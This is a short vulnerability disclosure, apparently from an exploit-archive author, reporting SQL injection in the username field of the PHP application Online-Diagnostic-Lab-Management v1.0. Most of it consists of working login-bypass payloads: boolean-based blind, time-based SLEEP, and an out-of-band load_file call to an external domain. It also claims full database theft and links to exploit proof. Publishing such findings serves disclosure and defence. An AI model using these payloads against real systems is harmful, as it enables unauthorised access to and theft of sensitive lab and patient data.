<pre><code>## Title: Online-Diagnostic-Lab-Management v1.0 Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 08/01/2023<br />## Vendor: https://www.youtube.com/watch?v=0nA5xfQ5G0g<br />## Vendor: https://www.youtube.com/@MayuriK<br />## Software: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The username parameter appears to be vulnerable to SQL injection<br />attacks. The payload '+(select<br />load_file('\\\\im86pxgqgu4kxgnpybjcpvwu1l7ev5qthw5oseg3.mnootupaputkaiisaebeqko.com\\mas'))+'<br />was submitted in the username parameter. This payload injects a SQL<br />sub-query that calls MySQL's load_file function with a UNC file path<br />that references a URL on an external domain. The application<br />interacted with that domain, indicating that the injected SQL query<br />was executed. The attacker can steal all information from the database<br />very easily.<br /><br />STATUS: HIGH-CRITICAL Vulnerability<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: username (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause<br /> Payload: username=-2553' OR 3590=3590-- aPlO&password=y4S!v5f!S4&login=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=hMRUaqVg'+(select<br />load_file('\\\\im86pxgqgu4kxgnpybjcpvwu1l7ev5qthw5oseg3.mnootupaputkaiisaebeqko.com\\mas'))+''<br />AND (SELECT 2815 FROM (SELECT(SLEEP(15)))TjiG)--<br />NgnE&password=y4S!v5f!S4&login=<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Online-Diagnostic-Lab-Management-1.10)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/07/online-diagnostic-lab-management-v10.html)<br /><br />## Time spend:<br />00:35:00<br /><br /><br /></code></pre>